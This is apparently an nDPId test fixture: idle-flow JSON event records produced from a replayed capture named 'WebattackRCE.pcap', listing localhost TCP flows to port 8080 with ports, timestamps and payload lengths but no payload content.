+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 